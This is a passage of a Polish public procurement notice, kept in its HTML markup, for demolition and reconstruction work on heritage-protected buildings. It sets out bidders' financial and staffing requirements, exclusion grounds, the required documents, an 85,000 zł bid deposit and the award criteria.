Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna, że Wykonawca spełni warunek jeżeli wykaże, że posiadaśrodki finansowe lub zdolność kredytową w wysokości nie niższej niż 1 000 000 zł (słownie: milionzłotych 00/100). Informacje dodatkowe Zgodnie z art. 26 ust. 2c ustawy, jeżeli z uzasadnionejprzyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej iekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który wwystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.Informacje dodatkowe</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykażę, że w okresie ostatnich pięciu latprzed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tymokresie, wykonał: a) co najmniej dwa zamówienia, których przedmiotem były roboty budowlanepolegające na rozbiórce budynków o kubaturze co najmniej 4000 m3, przy czym co najmniej jednarozbiórka dotyczyła budynku w zabudowie pierzejowej, b) co najmniej dwa zamówienia polegającena rozbudowie, nadbudowie, przebudowie lub odbudowie, obiektu kubaturowego, każde o wartościzamówienia co najmniej 4 mln zł, wpisanych do rejestru zabytków lub znajdujących się w strefieochrony konserwatora zabytków, Zamawiający uzna, że Wykonawca spełni warunek jeżeli wykaże,że dysponuje następującymi osobami, które będą brały czynny udział w realizacji zamówienia: a) conajmniej 1 osobą która łącznie posiada:- uprawnienia do kierowania robotami, w specjalnościkonstrukcyjno-budowlanej bez ograniczeń ispełnia kryteria posiadania kwalifikacji, o których mowa wart. 37 c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami, - co najmniej 3-letnie doświadczenie zawodowe polegające na pełnieniu funkcji kierownika budowy, w tym na conajmniej dwóch obiektach zabytkowych - wpisanych do rejestru zabytków lub znajdujących się wstrefie ochrony konserwatora zabytków (w tym miejskiej ewidencji zabytków), polegających na ichbudowie lub przebudowie, rozbudowie, odbudowie o wartościrobót nie mniejszej niż 2,5 mln zł. bruttooraz przy robotach polegających na rozbiórce co najmniej jednego budynku o kubaturze co najmniej4000 m3. b) co najmniej po 1 osobie, które posiadają uprawnienia budowlane w zakresie:- sieci,instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, -instalacji i urządzeń elektrycznych i elektroenergetycznych, bez ograniczeń do kierowania robotamibudowlanymi i co najmniej 2-letnie doświadczenie zawodowe polegające na kierowaniu, co najmniejtrzema robotami budowlanymi, każda o wartości nie mniejszej niż 250 000 zł brutto. Osoby powyższetj. z podpunktów a) i b) powinny ponadto posiadać udokumentowane doświadczenie w realizacjirobót przy zabytkach nieruchomych stosownie do wymagań Ustawy z dnia 23 lipca 2003 r. oochronie zabytków i opiece nad zabytkami.Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie doudziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówieniawraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: TakInformacje dodatkowe: Zamawiający dopuszcza by osoby wskazane przez Wykonawcę posiadałyrównoważne uprawnienia w określonej specjalności, które zostały wydane na podstawie wcześniejobowiązujących przepisów, zgodnie z wymogami ustawy Prawo Budowlane. Zamawiający dopuszczauprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz KonfederacjiSzwajcarskiej, zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych wpaństwach członkowskich Unii Europejskiej ispełnia kryteria posiadania kwalifikacji, o których mowaw art. 37c ustawy ( tj. Dz. U z 2014 r. poz. 1446 z późn. zm.). lub posiada inne tożsame uprawnienia,które zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiada zdobyte winnych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonychw ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych wpaństwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65.). Zamawiający będzie liczyłdoświadczenie zawodowe od dnia uzyskania uprawnień budowlanych. Zgodnie z art. 22d ust 2 pzpZamawiający może, na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganychzdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych w inne przedsięwzięciagospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. Dla potrzeb ocenyspełniania warunków określonych powyżej, jeśli wartości zostaną podane w walutach innych niż PLN,Zamawiający przyjmie średni kurs PLN dla tej waluty podawany przez NBP na dzień zamieszczeniaogłoszenia w Biuletynie Zamówień Publicznych. Średnie kursy walut dostępne są na stronieinternetowej Narodowego Banku Polskiego pod następującym adresem: http://www.nbp.pl/.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu,Zamawiający żąda od Wykonawcy najwyżej ocenionego dostarczenia następujących dokumentów: 1)odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw dowykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy; 2) zaświadczenia właściwej terenowej jednostkiorganizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznegoalbo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek naubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływemterminu składania ofert , lub innego dokumentu potwierdzającego, że Wykonawca zawarłporozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkamilub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie naraty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca niezalega z opłacaniem podatków, zaległości podatkowej, wystawionego nie wcześniej niż 3 miesiąceprzed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że Wykonawcazawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymiodsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zezwolenie, odroczenie lubrozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwegoorganu. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RzeczypospolitejPolskiej, zamiast dokumentów, o których mowa powyżej tj; w pkt 1,2,3 -składa dokument lubdokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,potwierdzające odpowiednio, że: a) nie zalega z opłacaniem podatków, opłat, składek naubezpieczenie społeczne lub zdrowotne albo, że zawarł porozumienie z właściwym organem w sprawiespłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskałprzewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniew całości wykonania decyzji właściwego organu, b) nie otwarto jego likwidacji ani nie ogłoszonoupadłości. Dokumenty, o których mowa powyżej tj: w lit. a, powinny być wystawione nie wcześniejniż 3 miesiące przed upływem tego terminu. Zamawiający żąda od Wykonawcy, który polega nazdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a Pzp, przedstawieniaw odniesieniu do tych podmiotów dokumentów wymienionych powyżej tj: w w pkt. 1,2,3.Oświadczenia dotyczące Wykonawcy i innych podmiotów, na których zdolnościach lub sytuacjipolega Wykonawca na zasadach określonych w art. 22a ustawy oraz dotyczące podwykonawców,składane są w oryginale. Dokumenty inne niż oświadczenia, o których mowa wyżej składane są woryginale lub kopii poświadczonej za zgodność z oryginałem. Poświadczenia za zgodność z oryginałemdokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach lub sytuacji polegaWykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albopodwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poświadczenie za zgodnośćz oryginałem następuje w formie pisemnej. Zamawiający może żądać przedstawienia oryginału lubnotarialnie poświadczonej kopii dokumentów innych niż oświadczenia, wyłącznie wtedy, gdy złożonakopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości. Dokumentysporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. W przypadkuwspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o spełnieniu warunkówudziału w postępowaniu a także braku podstaw do wykluczenia składa każdy z wykonawcówwspólnie ubiegających się o zamówienie. Oświadczenie ma potwierdzać spełnianie warunków udziałuw postępowaniu, oraz brak podstaw do wykluczenia Wykonawcy występujący wspólnie muszą,zgodnie z zapisami art. 23 ust. 2 ustawy Prawo zamówień publicznych ustanowić pełnomocnika(lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub doreprezentowania ich w postępowaniu oraz zawarciu umowy o udzielenie przedmiotowego zamówieniapublicznego. Do oferty należy dołączyć pełnomocnictwo, które powinno dokładnie określać zakresumocowania.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Zgodnie z art. 26 ust. 2 ustawy, Zamawiający wezwie Wykonawcę, którego oferta została najwyżejoceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenianiżej wymienionych oświadczeń lub dokumentów: 1. W celu potwierdzenia spełniania warunkudotyczącego zdolności technicznej lub zawodowej, zamawiający żąda od Wykonawcy najwyżejocenionego. Wykazu wykonanych robót budowlanych w okresie ostatnich 5-lat przed upływemterminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz zpodaniem ich wartości, rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których robotyzostały wykonane. Do każdej roboty budowlanej zawartej w wykazie należy załączyć dowodyokreślające czy te roboty zostały wykonane należycie, w szczególności informacje o tym, czy robotyzostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Dowodami, októrych mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane. a jeżeli z uzasadnionej przyczyny o obiektywnym charakterzewykonawca nie jest w stanie uzyskać tych dokumentów inne dokumenty. Jeżeli z uzasadnionychprzyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dowodów, o którychmowa powyżej iskłada inne dokumenty, zobowiązany jest podać przyczyny braku możliwościuzyskania tych dowodów. Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówieniapublicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz zinformacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenianiezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją o podstawie do dysponowania tymi osobami. 2. W celu potwierdzeniaspełniania warunku dotyczącego sytuacji ekonomicznej lub finansowej, Zamawiający żąda odWykonawcy: informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającejwysokość posiadanych środków finansowych lub zdolności kredytowej Wykonawcy wystawionej wokresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert. Wykonawcapowołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innychpodmiotów, które będą brały udział w realizacji części zamówienia przedkłada także dokumentydotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, określone w ust. 1 i 2 sekcjiIII.5.1 niniejszego ogłoszenia. Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w odniesieniu do zamówienia, lub jego części, polegać na zdolnościach technicznychlub zawodowych lub sytuacjifinansowej lub ekonomicznej innych podmiotów, niezależnie odcharakteru prawnego łączących go z nim stosunków prawnych.Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów napotrzeby realizacji zamówienia. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacjizawodowych lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeślipodmioty te zrealizują roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane.Zobowiązanie podmiotu trzeciego powinno wyrażać, w sposób jednoznaczny i nie budzącywątpliwości, wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie, odpowiedniego zasobu. Wsytuacji, gdy przedmiotem zobowiązania do udostępnienia zasobów są zasoby nierozerwalnie związanez podmiotem ich udzielającym (takie jak wiedza i doświadczenie), niemożliwe do samodzielnegoobrotu i dalszego udostępnienia ich bez zaangażowania tego podmiotu w wykonanie zamówienia,dokument zobowiązania powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu wwykonaniu zamówienia. Pisemne zobowiązanie podmiotu trzeciego musi zawierać: a) zakresdostępnych Wykonawcy zasobów innego podmiotu, b) sposób wykorzystania zasobów innegopodmiotu, przez Wykonawcę, przy wykonywaniu przedmiotowego zamówienia, c) zakres i okresudziału innego podmiotu przy wykonywaniu zamówienia, d) informację czy podmiot, na zdolnościachktórego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, którychwskazane zdolności dotyczą. Wykonawca, który polega na sytuacji finansowej lub ekonomicznejinnych podmiotów. Odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnieniazasobów, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tychzasobów, chyba że za uniedostępnienie zasobów nie ponosi winy.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Złożona przez wykonawcę oferta zawiera:- wypełniony formularz ofertowy z wykorzystaniem wzoru, -oświadczenie o spełnieniu warunków udziału, - oświadczenie o braku podstaw do wykluczenia, -pełnomocnictwo - w przypadku podpisania oferty przez osobę niewymienioną w dokumencierejestracyjnym (ewidencyjnym), - zobowiązanie podmiotów trzecich (jeżeli dotyczy), - dokumentpotwierdzający wniesienie wadium,</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Ustala się wadium w wysokości: 85 000,00 PLN (słownie: osiemdziesiąt pięć tysięcy złotych00/100). 2. Wykonawca wnosi wadium nie później niż przed upływem terminu składania ofert wnastępujących formach:- pieniądzu, przelewem na rachunek Zamawiającego nr 88 1020 1026 00001102 0233 3797. - poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowokredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, -gwarancjach bankowych, - gwarancjach ubezpieczeniowych, - poręczeniach udzielanych przezpodmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniuPolskiej AgencjiRozwoju Przedsiębiorczości. 3. Skuteczne wniesienie wadium w pieniądzu następuje zchwilą znalezienia się środków finansowych na rachunku Zamawiającego, przed upływem terminuskładania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie: a) pieniężnej - dokumentpotwierdzający dokonanie przelewu wadium został załączony do oferty; b) innej niż pieniądz - oryginałdokumentu został złożony w oddzielnej kopercie, a jego kopia w ofercie. 5. Zamawiający zatrzymujewadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:- odmówił podpisaniaumowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, - nie wniósłzabezpieczenia należytego wykonania umowy na zasadach określonych w specyfikacji istotnychwarunków zamówienia, - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe zprzyczyn leżących po stronie wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja na roboty ogólnobudowlane</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie osoby sprawującej funkcje kierownika budowy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span 